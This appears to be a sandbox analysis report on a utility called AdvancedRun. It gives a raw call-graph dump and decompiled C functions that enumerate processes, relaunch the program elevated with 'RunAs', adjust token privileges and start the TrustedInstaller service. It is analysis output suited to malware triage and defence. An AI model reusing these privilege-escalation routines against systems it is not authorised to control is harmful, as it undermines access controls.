??2@YAPAXI 5814 4066c9 ??2@YAPAXI 5813->5814 5816 4066ea ??2@YAPAXI 5814->5816 5818 40670b ??2@YAPAXI 5816->5818 5820 403521 memset 5818->5820 5820->5755 5822 402b79 2 API calls 5821->5822 5823 402ce3 5822->5823 5823->5759 5823->5760 5841 406746 5824->5841 5827 4067cd 5829 4067e0 5827->5829 5831 4055d1 free 5827->5831 5828 4055d1 free 5830 4067c6 ??3@YAXPAX 5828->5830 5832 4067f3 5829->5832 5834 4055d1 free 5829->5834 5830->5827 5833 4067d9 ??3@YAXPAX 5831->5833 5835 4055d1 free 5832->5835 5838 406806 5832->5838 5833->5829 5836 4067ec ??3@YAXPAX 5834->5836 5837 4067ff ??3@YAXPAX 5835->5837 5836->5832 5837->5838 5839 406837 free 5838->5839 5839->5762 5840->5813 5842 406751 ??3@YAXPAX 5841->5842 5843 406758 5841->5843 5842->5843 5844 406766 5843->5844 5845 40675f ??3@YAXPAX 5843->5845 5846 406770 ??3@YAXPAX 5844->5846 5847 406777 5844->5847 5845->5844 5846->5847 5848 406797 5847->5848 5849 406790 ??3@YAXPAX 5847->5849 5850 406787 ??3@YAXPAX 5847->5850 5848->5827 5848->5828 5849->5848 5850->5849 5851 407e24 memset memset 5852 407e6e 5851->5852 5853 407250 2 API calls 5852->5853 5854 407e7a _snwprintf 5853->5854 5855 407343 6 API calls 5854->5855 5856 407ea7 5855->5856 5857 40b225 __dllonexit 5858 40aba5 5859 40ac15 5858->5859 5860 40abb7 BeginDeferWindowPos 5858->5860 5863 40ac26 5859->5863 5869 402ec8 6 API calls 5859->5869 5861 402e22 3 API calls 5860->5861 5864 40abdc 5861->5864 5865 402e22 3 API calls 5864->5865 5866 40abeb 5865->5866 5867 402e22 3 API calls 5866->5867 5868 40abfb EndDeferWindowPos InvalidateRect 5867->5868 5868->5863 5869->5863 5870 40a726 5871 40a733 5870->5871 5873 40a750 5870->5873 5874 406d12 5871->5874 5875 406d27 5874->5875 5876 406d3b 5874->5876 5880 4033c7 SendMessageW 5875->5880 5878 4033c7 SendMessageW 5876->5878 5879 406d2c 5878->5879 5879->5873 5881 4033df 5880->5881 5881->5879 5882 402b26 5883 402b32 ExitProcess 5882->5883 5884 402b3a 5882->5884 5885 405d6a 4 API calls 5884->5885 5887 402b56 5884->5887 5885->5887 5886 402b5d SetWindowLongW 5888 402b6a 5886->5888 5887->5886 5887->5888 5889 40b6a6 5890 40b6b6 5889->5890 5891 40b6af ??3@YAXPAX 5889->5891 5892 40b6c6 5890->5892 5893 40b6bf ??3@YAXPAX 5890->5893 5891->5890 5894 40b6d6 5892->5894 5895 40b6cf ??3@YAXPAX 5892->5895 5893->5892 5896 40b6e6 5894->5896 5897 40b6df ??3@YAXPAX 5894->5897 5895->5894 5897->5896 5898 40b5a8 5899 40171f memset 5898->5899 5900 40b5b3 5899->5900 5901 40b23c 2 API calls 5900->5901 5902 40b5d6 5901->5902 5903 40a1a9 5904 409e82 4 API calls 5903->5904 5905 40a1d7 5904->5905 5906 402aaa 5907 402ab6 5906->5907 5908 405e0a 8 API calls 5907->5908 5912 402add 5907->5912 5909 402aca 5908->5909 5916 40588e 5909->5916 5911 402b6a 5912->5911 5913 405d6a 4 API calls 5912->5913 5915 402b56 5912->5915 5913->5915 5914 402b5d SetWindowLongW 5914->5911 5915->5911 5915->5914 5917 4058a9 ??2@YAPAXI memset memcpy 5916->5917 5919 405898 5916->5919 5918 4058ec ??3@YAXPAX 5917->5918 5920 4058f3 5917->5920 5918->5920 5919->5917 5919->5920 5920->5912 5921 40a92b 5922 40a980 _itow 5921->5922 5923 40a93e 5921->5923 5924 40a947 5922->5924 5923->5924 5925 40a961 wcschr 5923->5925 5926 40a944 5923->5926 5925->5924 5926->5924 5928 404ed0 5926->5928 5929 404ee1 5928->5929 5930 404ee9 FileTimeToSystemTime 5928->5930 5929->5930 5932 404f69 wcscpy 5929->5932 5931 404ef8 5930->5931 5930->5932 5931->5932 5933 404f00 GetDateFormatW GetTimeFormatW wcscpy wcscat wcscat 5931->5933 5934 404f78 5932->5934 5933->5934 5934->5924 4537 40a12c 4540 409e82 4537->4540 4539 40a14c 4541 409ea0 GetPrivateProfileIntW 4540->4541 4542 409e8e 4540->4542 4541->4539 4545 409d12 memset _itow WritePrivateProfileStringW 4542->4545 4544 409e9b 4544->4539 4545->4544 5938 405dac 5939 40b550 5938->5939 5940 405db9 memset GetDlgCtrlID 5939->5940 5941 405edd 5 API calls 5940->5941 5942 405ded 5941->5942 5943 405e03 5942->5943 5944 405df3 SetWindowTextW 5942->5944 5944->5943 5945 40a82d 5946 402ddd 6 API calls 5945->5946 5947 40a842 5946->5947 5948 402d78 10 API calls 5947->5948 5949 40a849 GetDlgItem 5948->5949 5960 4068ec 5949->5960 5953 40a8ce 5977 407f8d 5953->5977 5954 40a885 5954->5953 5974 403213 5954->5974 5957 40a8d5 5987 40ab39 5957->5987 5961 4068fd 5960->5961 5962 406746 5 API calls 5961->5962 5963 406907 ??2@YAPAXI ??2@YAPAXI 5962->5963 5964 40695c memcpy memcpy 5963->5964 5965 4069a1 5964->5965 5965->5964 5966 4069d9 ??2@YAPAXI ??2@YAPAXI 5965->5966 5969 405b81 16 API calls 5965->5969 5967 406a18 5966->5967 5968 406a23 5966->5968 5996 406607 5967->5996 6000 40686c 5968->6000 5969->5965 5972 406a69 5973 408157 SendMessageW SendMessageW 5972->5973 5973->5954 5975 403239 SendMessageW 5974->5975 5976 40322f wcslen 5974->5976 5975->5954 5976->5975 5978 408053 5977->5978 5979 407fb3 5977->5979 5980 408089 11 API calls 5978->5980 5981 40805b ImageList_Create ImageList_SetImageCount SendMessageW 5978->5981 5982 408024 ImageList_Create ImageList_SetImageCount 5979->5982 5983 407fbb memset memset GetWindowsDirectoryW SHGetFileInfoW 5979->5983 6017 40331d SendMessageW 5980->6017 5981->5980 5984 408044 SendMessageW 5982->5984 5983->5984 5984->5978 5986 408142 SendMessageW 5986->5957 5988 40a8f5 SetFocus 5987->5988 5989 40ab45 5987->5989 5989->5988 5990 406ccb SendMessageW 5989->5990 5991 40ab56 _wcsicmp 5989->5991 5990->5989 5991->5989 5992 40ab73 5991->5992 5993 40684f SendMessageW 5992->5993 5994 40ab80 SendMessageW 5993->5994 5995 40684f SendMessageW 5994->5995 5995->5988 5997 406611 ??2@YAPAXI 5996->5997 5998 40660e 5996->5998 5999 406637 5997->5999 5998->5997 5999->5968 5999->5999 6001 4055d1 free 6000->6001 6002 406875 6001->6002 6003 4055d1 free 6002->6003 6004 40687d 6003->6004 6005 4055d1 free 6004->6005 6006 406885 6005->6006 6007 4055d1 free 6006->6007 6008 40688d 6007->6008 6009 40559a 4 API calls 6008->6009 6010 4068a0 6009->6010 6011 40559a 4 API calls 6010->6011 6012 4068aa 6011->6012 6013 40559a 4 API calls 6012->6013 6014 4068b4 6013->6014 6015 40559a 4 API calls 6014->6015 6016 4068be 6015->6016 6016->5972 6017->5986 6018 4030ad 6019 4030d3 6018->6019 6020 4030b6 6018->6020 6021 40304d 3 API calls 6020->6021 6022 4030bf 6021->6022 6022->6019 6023 4030c3 _wtoi 6022->6023 6023->6019 6024 407ead 6025 407eb5 6024->6025 6026 407ebc 6024->6026 6027 405b81 16 API calls 6025->6027 6028 407eba 6027->6028 6029 406ab1 6031 406ac2 6029->6031 6030 406b07 6032 406b7b 6030->6032 6034 406b5d _wcsicmp 6030->6034 6031->6030 6033 406aff _wcsicmp 6031->6033 6033->6030 6034->6030 4532 40a33b FindResourceW 4533 40a354 SizeofResource 4532->4533 4536 40a37e 4532->4536 4534 40a365 LoadResource 4533->4534 4533->4536 4535 40a373 LockResource 4534->4535 4534->4536 4535->4536 4546 40b23c 4549 40b216 4546->4549 4548 40b245 4550 40b225 __dllonexit 4549->4550 4551 40b21f _onexit 4549->4551 4550->4548 4551->4550

                                                                  Executed Functions

                                                                  Function 004095FD, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 120processlibraryloaderCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  C-Code - Quality: 93%
                                                                  			E004095FD(void* __edx, void* __eflags, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				char _v16;
				char _v24;
				char _v32;
				char _v40;
				char _v48;
				intOrPtr _v52;
				char _v576;
				long _v580;
				intOrPtr _v1112;
				long _v1128;
				void _v1132;
				void* _v1136;
				void _v1658;
				char _v1660;
				void* __edi;
				void* __esi;
				void* _t41;
				long _t49;
				void* _t50;
				intOrPtr* _t66;
				struct HINSTANCE__* _t68;
				void* _t71;
				void* _t83;
				void* _t84;
				void* _t85;

				_t78 = _a4;
				E004099D4(_a4 + 0x28);
				_t41 = CreateToolhelp32Snapshot(2, 0); // executed
				_v12 = _t41;
				memset( &_v1132, 0, 0x228);
				_t84 = _t83 + 0xc;
				_v1136 = 0x22c;
				Process32FirstW(_v12,  &_v1136); // executed
				while(Process32NextW(_v12,  &_v1136) != 0) {
					E004090AF( &_v580);
					_t49 = _v1128;
					_v580 = _t49;
					_v52 = _v1112;
					_t50 = OpenProcess(0x410, 0, _t49);
					_v8 = _t50;
					if(_t50 != 0) {
						L4:
						_v1660 = 0;
						memset( &_v1658, 0, 0x208);
						_t85 = _t84 + 0xc;
						E004098F9(_t78, _v8,  &_v1660);
						if(_v1660 != 0) {
							L10:
							E0040920A( &_v576,  &_v1660);
							E00409555(_v8,  &_v48,  &_v40,  &_v32,  &_v24); // executed
							_t84 = _t85 + 0x14;
							CloseHandle(_v8);
							_t78 = _a4;
							L11:
							E004099ED(_t78 + 0x28,  &_v580);
							continue;
						}
						_v16 = 0x104;
						if( *0x41c8e0 == 0) {
							_t68 = GetModuleHandleW(L"kernel32.dll");
							if(_t68 != 0) {
								 *0x41c8e0 = 1;
								 *0x41c8e4 = GetProcAddress(_t68, "QueryFullProcessImageNameW");
							}
						}
						_t66 =  *0x41c8e4;
						if(_t66 != 0) {
							 *_t66(_v8, 0,  &_v1660,  &_v16); // executed
						}
						goto L10;
					}
					if( *((intOrPtr*)(E00404BAF() + 4)) <= 5) {
						goto L11;
					}
					_t71 = OpenProcess(0x1000, 0, _v580);
					_v8 = _t71;
					if(_t71 == 0) {
						goto L11;
					}
					goto L4;
				}
				return CloseHandle(_v12);
			}






























                                                                  0x00409609
                                                                  0x0040960f
                                                                  0x00409619
                                                                  0x00409623
                                                                  0x0040962e
                                                                  0x00409633
                                                                  0x00409640
                                                                  0x0040964a
                                                                  0x00409782
                                                                  0x0040965a
                                                                  0x0040965f
                                                                  0x00409678
                                                                  0x0040967e
                                                                  0x00409681
                                                                  0x00409685
                                                                  0x00409688
                                                                  0x004096b2
                                                                  0x004096bf
                                                                  0x004096c6
                                                                  0x004096cb
                                                                  0x004096da
                                                                  0x004096e6
                                                                  0x0040973b
                                                                  0x00409747
                                                                  0x0040975f
                                                                  0x00409764
                                                                  0x0040976a
                                                                  0x00409770
                                                                  0x00409773
                                                                  0x0040977d
                                                                  0x00000000
                                                                  0x0040977d
                                                                  0x004096ee
                                                                  0x004096f5
                                                                  0x004096fc
                                                                  0x00409704
                                                                  0x0040970c
                                                                  0x0040971c
                                                                  0x0040971c
                                                                  0x00409704
                                                                  0x00409721
                                                                  0x00409728
                                                                  0x00409739
                                                                  0x00409739
                                                                  0x00000000
                                                                  0x00409728
                                                                  0x00409693
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004096a5
                                                                  0x004096a9
                                                                  0x004096ac
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004096ac
                                                                  0x004097a6

                                                                  APIs
                                                                    • Part of subcall function 004099D4: free.MSVCRT(00000000,00409614,?,?,00000000), ref: 004099DB
                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00409619
                                                                  • memset.MSVCRT ref: 0040962E
                                                                  • Process32FirstW.KERNEL32(?,?), ref: 0040964A
                                                                  • OpenProcess.KERNEL32(00000410,00000000,?,?,?,00000000), ref: 00409681
                                                                  • OpenProcess.KERNEL32(00001000,00000000,?), ref: 004096A5
                                                                  • memset.MSVCRT ref: 004096C6
                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 004096FC
                                                                  • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00409716
                                                                  • QueryFullProcessImageNameW.KERNELBASE(00000000,00000000,?,00000104,00000000,?), ref: 00409739
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?), ref: 0040976A
                                                                  • Process32NextW.KERNEL32(?,0000022C), ref: 0040978C
                                                                  • CloseHandle.KERNEL32(?,?,0000022C,?,?,?,?,00000000,?), ref: 0040979C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: HandleProcess$CloseOpenProcess32memset$AddressCreateFirstFullImageModuleNameNextProcQuerySnapshotToolhelp32free
                                                                  • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                  • API String ID: 239888749-1740548384
                                                                  • Opcode ID: 93ba788d12a5409cd6757bb7493d38e70eb600f2f73dc0c750eaff65fc83c0f1
                                                                  • Instruction ID: d99fb1acad5946e2155d0e2cb4f7ec9e68cfc0f9061ce230986eeb1e4b65db1d
                                                                  • Opcode Fuzzy Hash: 93ba788d12a5409cd6757bb7493d38e70eb600f2f73dc0c750eaff65fc83c0f1
                                                                  • Instruction Fuzzy Hash: 10413DB2900118EEDB10EFA0DCC5AEEB7B9EB44348F1041BAE609B3191D7359E85DF59
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00401C26, Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 72synchronizationCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  C-Code - Quality: 75%
                                                                  			E00401C26(long _a4) {
				struct _SHELLEXECUTEINFOW _v68;
				void _v582;
				char _v584;
				void _v1110;
				char _v1112;
				long _t23;
				int _t36;
				int _t41;
				void* _t43;
				long _t44;

				_t44 = 0;
				_t23 = GetCurrentProcessId();
				_v584 = 0;
				memset( &_v582, 0, 0x1fe);
				_v1112 = 0;
				memset( &_v1110, 0, 0x208);
				E00404AD9( &_v1112);
				_push(_t23);
				_push(0);
				_push(_a4);
				_push(L"/SpecialRun %I64x %d");
				_push(0xff);
				_push( &_v584);
				L0040B1EC();
				memset( &(_v68.fMask), 0, 0x38);
				_v68.lpFile =  &_v1112;
				_v68.lpParameters =  &_v584;
				_v68.cbSize = 0x3c;
				_v68.lpVerb = L"RunAs";
				_v68.fMask = 0x40;
				_v68.nShow = 5;
				_t36 = ShellExecuteExW( &_v68); // executed
				_t43 = _v68.hProcess;
				if(_t36 == 0) {
					_t44 = GetLastError();
				} else {
					WaitForSingleObject(_t43, 0x5dc);
					_a4 = 0;
					_t41 = GetExitCodeProcess(_t43,  &_a4); // executed
					if(_t41 != 0 && _a4 != 0x103) {
						_t44 = _a4;
					}
				}
				return _t44;
			}













                                                                  0x00401c31
                                                                  0x00401c33
                                                                  0x00401c48
                                                                  0x00401c4f
                                                                  0x00401c61
                                                                  0x00401c68
                                                                  0x00401c74
                                                                  0x00401c79
                                                                  0x00401c7a
                                                                  0x00401c7b
                                                                  0x00401c84
                                                                  0x00401c89
                                                                  0x00401c8e
                                                                  0x00401c8f
                                                                  0x00401c9b
                                                                  0x00401ca6
                                                                  0x00401caf
                                                                  0x00401cb9
                                                                  0x00401cc0
                                                                  0x00401cc7
                                                                  0x00401cce
                                                                  0x00401cd5
                                                                  0x00401cdd
                                                                  0x00401ce0
                                                                  0x00401d14
                                                                  0x00401ce2
                                                                  0x00401ce8
                                                                  0x00401cf3
                                                                  0x00401cf6
                                                                  0x00401cfe
                                                                  0x00401d09
                                                                  0x00401d09
                                                                  0x00401cfe
                                                                  0x00401d1b

                                                                  APIs
                                                                  • GetCurrentProcessId.KERNEL32(004101D8,?), ref: 00401C33
                                                                  • memset.MSVCRT ref: 00401C4F
                                                                  • memset.MSVCRT ref: 00401C68
                                                                    • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                  • _snwprintf.MSVCRT ref: 00401C8F
                                                                  • memset.MSVCRT ref: 00401C9B
                                                                  • ShellExecuteExW.SHELL32(?), ref: 00401CD5
                                                                  • WaitForSingleObject.KERNEL32(?,000005DC), ref: 00401CE8
                                                                  • GetExitCodeProcess.KERNELBASE ref: 00401CF6
                                                                  • GetLastError.KERNEL32 ref: 00401D0E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: memset$Process$CodeCurrentErrorExecuteExitFileLastModuleNameObjectShellSingleWait_snwprintf
                                                                  • String ID: /SpecialRun %I64x %d$<$@$RunAs
                                                                  • API String ID: 903100921-3385179869
                                                                  • Opcode ID: b1512c014bb39f996462de76d08949c278b93179518c0e0ab6201644cc20f86b
                                                                  • Instruction ID: 2715f163b7cd274c39606e2610d12bc00880993b2534c3bb77a56ee1366ffd0d
                                                                  • Opcode Fuzzy Hash: b1512c014bb39f996462de76d08949c278b93179518c0e0ab6201644cc20f86b
                                                                  • Instruction Fuzzy Hash: FD216D71900118FBDB20DB91CD48ADF7BBCEF44744F004176F608B6291D778AA84CBA9
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00408FC9, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 63libraryloaderCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  C-Code - Quality: 100%
                                                                  			E00408FC9(struct HINSTANCE__** __eax, void* __eflags, WCHAR* _a4) {
				void* _v8;
				intOrPtr _v12;
				struct _TOKEN_PRIVILEGES _v24;
				void* __esi;
				_Unknown_base(*)()* _t16;
				_Unknown_base(*)()* _t18;
				long _t19;
				_Unknown_base(*)()* _t22;
				_Unknown_base(*)()* _t24;
				struct HINSTANCE__** _t35;
				void* _t37;

				_t37 = __eflags;
				_t35 = __eax;
				if(E00408F92(_t35, _t37, GetCurrentProcess(), 0x28,  &_v8) == 0) {
					return GetLastError();
				}
				_t16 = E00408F72(_t35);
				__eflags = _t16;
				if(_t16 != 0) {
					_t24 = GetProcAddress( *_t35, "LookupPrivilegeValueW");
					__eflags = _t24;
					if(_t24 != 0) {
						LookupPrivilegeValueW(0, _a4,  &(_v24.Privileges)); // executed
					}
				}
				_v24.PrivilegeCount = 1;
				_v12 = 2;
				_a4 = _v8;
				_t18 = E00408F72(_t35);
				__eflags = _t18;
				if(_t18 != 0) {
					_t22 = GetProcAddress( *_t35, "AdjustTokenPrivileges");
					__eflags = _t22;
					if(_t22 != 0) {
						AdjustTokenPrivileges(_a4, 0,  &_v24, 0, 0, 0); // executed
					}
				}
				_t19 = GetLastError();
				FindCloseChangeNotification(_v8); // executed
				return _t19;
			}














                                                                  0x00408fc9
                                                                  0x00408fd0
                                                                  0x00408fe8
                                                                  0x00000000
                                                                  0x00408fea
                                                                  0x00408ff4
                                                                  0x00409001
                                                                  0x00409003
                                                                  0x0040900c
                                                                  0x0040900e
                                                                  0x00409010
                                                                  0x0040901a
                                                                  0x0040901a
                                                                  0x00409010
                                                                  0x0040901f
                                                                  0x00409026
                                                                  0x0040902d
                                                                  0x00409030
                                                                  0x00409035
                                                                  0x00409037
                                                                  0x00409040
                                                                  0x00409042
                                                                  0x00409044
                                                                  0x00409051
                                                                  0x00409051
                                                                  0x00409044
                                                                  0x00409053
                                                                  0x0040905e
                                                                  0x00000000

                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8
                                                                    • Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00408FA8
                                                                  • GetLastError.KERNEL32(00000000), ref: 00408FEA
                                                                  • GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueW), ref: 0040900C
                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 0040901A
                                                                  • GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 00409040
                                                                  • AdjustTokenPrivileges.KERNELBASE(00000002,00000000,00000001,00000000,00000000,00000000), ref: 00409051
                                                                  • GetLastError.KERNEL32(00000000,00000000,00000000), ref: 00409053
                                                                  • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0040905E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$ErrorLast$AdjustChangeCloseCurrentFindLookupNotificationPrivilegePrivilegesProcessTokenValue
                                                                  • String ID: AdjustTokenPrivileges$LookupPrivilegeValueW
                                                                  • API String ID: 616250965-1253513912
                                                                  • Opcode ID: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
                                                                  • Instruction ID: 03a5dc6c67e2a3af6dad2eaf9b7d3d3c38ee31464385454108c093b6d6cde588
                                                                  • Opcode Fuzzy Hash: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
                                                                  • Instruction Fuzzy Hash: 34114F72500105FFEB10AFF4DD859AF76ADAB44384B10413AF541F2192DA789E449B68
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00401306, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38serviceCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 399 401306-40132b OpenServiceW 400 401350-40135b CloseServiceHandle 399->400 401 40132d-40133a QueryServiceStatus 399->401 402 40133c-401340 401->402 403 40134d-40134e CloseServiceHandle 401->403 402->403 404 401342-40134b StartServiceW 402->404 403->400 404->403
                                                                  C-Code - Quality: 100%
                                                                  			E00401306(void* _a4) {
				intOrPtr _v28;
				struct _SERVICE_STATUS _v32;
				void* _t5;
				int _t12;
				void* _t14;

				_t12 = 0; // executed
				_t5 = OpenServiceW(_a4, L"TrustedInstaller", 0x34); // executed
				_t14 = _t5;
				if(_t14 != 0) {
					if(QueryServiceStatus(_t14,  &_v32) != 0 && _v28 != 4) {
						_t12 = StartServiceW(_t14, 0, 0);
					}
					CloseServiceHandle(_t14);
				}
				CloseServiceHandle(_a4);
				return _t12;
			}








                                                                  0x00401319
                                                                  0x0040131b
                                                                  0x00401327
                                                                  0x0040132b
                                                                  0x0040133a
                                                                  0x0040134b
                                                                  0x0040134b
                                                                  0x0040134e
                                                                  0x0040134e
                                                                  0x00401353
                                                                  0x0040135b

                                                                  APIs
                                                                  • OpenServiceW.ADVAPI32(00402183,TrustedInstaller,00000034,?,?,00000000,?,?,?,?,?,00402183,00000000), ref: 0040131B
                                                                  • QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,00402183,00000000), ref: 00401332
                                                                  • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 00401345
                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,00402183,00000000), ref: 0040134E
                                                                  • CloseServiceHandle.ADVAPI32(00402183,?,?,?,?,?,00402183,00000000), ref: 00401353
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: Service$CloseHandle$OpenQueryStartStatus
                                                                  • String ID: TrustedInstaller
                                                                  • API String ID: 862991418-565535830
                                                                  • Opcode ID: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
                                                                  • Instruction ID: 300c39592a487ff017dde1f9aaf4b69bffecac74e3568357a1b40912e0f2caec
                                                                  • Opcode Fuzzy Hash: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
                                                                  • Instruction Fuzzy Hash: F9F08275601218FBE7222BE59CC8DAF7A6CDF88794B040132FD01B12A0D674DD05C9F9
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040A33B, Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 432 40a33b-40a352 FindResourceW 433 40a354-40a363 SizeofResource 432->433 434 40a3b9-40a3be 432->434 435 40a365-40a371 LoadResource 433->435 436 40a3b8 433->436 435->436 437 40a373-40a37c LockResource 435->437 436->434 437->436 438 40a37e-40a38c 437->438 439 40a3aa-40a3b3 438->439 440 40a38e 438->440 439->436 441 40a38f-40a3a7 440->441 441->441 442 40a3a9 441->442 442->439
                                                                  C-Code - Quality: 100%
                                                                  			E0040A33B(unsigned int _a4, WCHAR* _a8, WCHAR* _a12) {
				struct HRSRC__* _t12;
				void* _t16;
				void* _t17;
				signed int _t18;
				signed int _t26;
				signed int _t29;
				signed int _t33;
				struct HRSRC__* _t35;
				signed int _t36;

				_t12 = FindResourceW(_a4, _a12, _a8); // executed
				_t35 = _t12;
				if(_t35 != 0) {
					_t33 = SizeofResource(_a4, _t35);
					if(_t33 > 0) {
						_t16 = LoadResource(_a4, _t35);
						if(_t16 != 0) {
							_t17 = LockResource(_t16);
							if(_t17 != 0) {
								_a4 = _t33;
								_t29 = _t33 * _t33;
								_t36 = 0;
								_t7 =  &_a4;
								 *_t7 = _a4 >> 2;
								if( *_t7 != 0) {
									do {
										_t26 =  *(_t17 + _t36 * 4) * _t36 * _t33 * 0x00000011 ^  *(_t17 + _t36 * 4) + _t29;
										_t36 = _t36 + 1;
										_t29 = _t26;
									} while (_t36 < _a4);
								}
								_t18 =  *0x40fa70; // 0xfcb617dc
								 *0x40fa70 = _t18 + _t29 ^ _t33;
							}
						}
					}
				}
				return 1;
			}












                                                                  0x0040a348
                                                                  0x0040a34e
                                                                  0x0040a352
                                                                  0x0040a35f
                                                                  0x0040a363
                                                                  0x0040a369
                                                                  0x0040a371
                                                                  0x0040a374
                                                                  0x0040a37c
                                                                  0x0040a380
                                                                  0x0040a383
                                                                  0x0040a386
                                                                  0x0040a388
                                                                  0x0040a388
                                                                  0x0040a38c
                                                                  0x0040a38f
                                                                  0x0040a39f
                                                                  0x0040a3a1
                                                                  0x0040a3a5
                                                                  0x0040a3a5
                                                                  0x0040a3a9
                                                                  0x0040a3aa
                                                                  0x0040a3b3
                                                                  0x0040a3b3
                                                                  0x0040a37c
                                                                  0x0040a371
                                                                  0x0040a3b8
                                                                  0x0040a3be

                                                                  APIs
                                                                  • FindResourceW.KERNELBASE(?,?,?), ref: 0040A348
                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 0040A359
                                                                  • LoadResource.KERNEL32(?,00000000), ref: 0040A369
                                                                  • LockResource.KERNEL32(00000000), ref: 0040A374
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: Resource$FindLoadLockSizeof
                                                                  • String ID:
                                                                  • API String ID: 3473537107-0
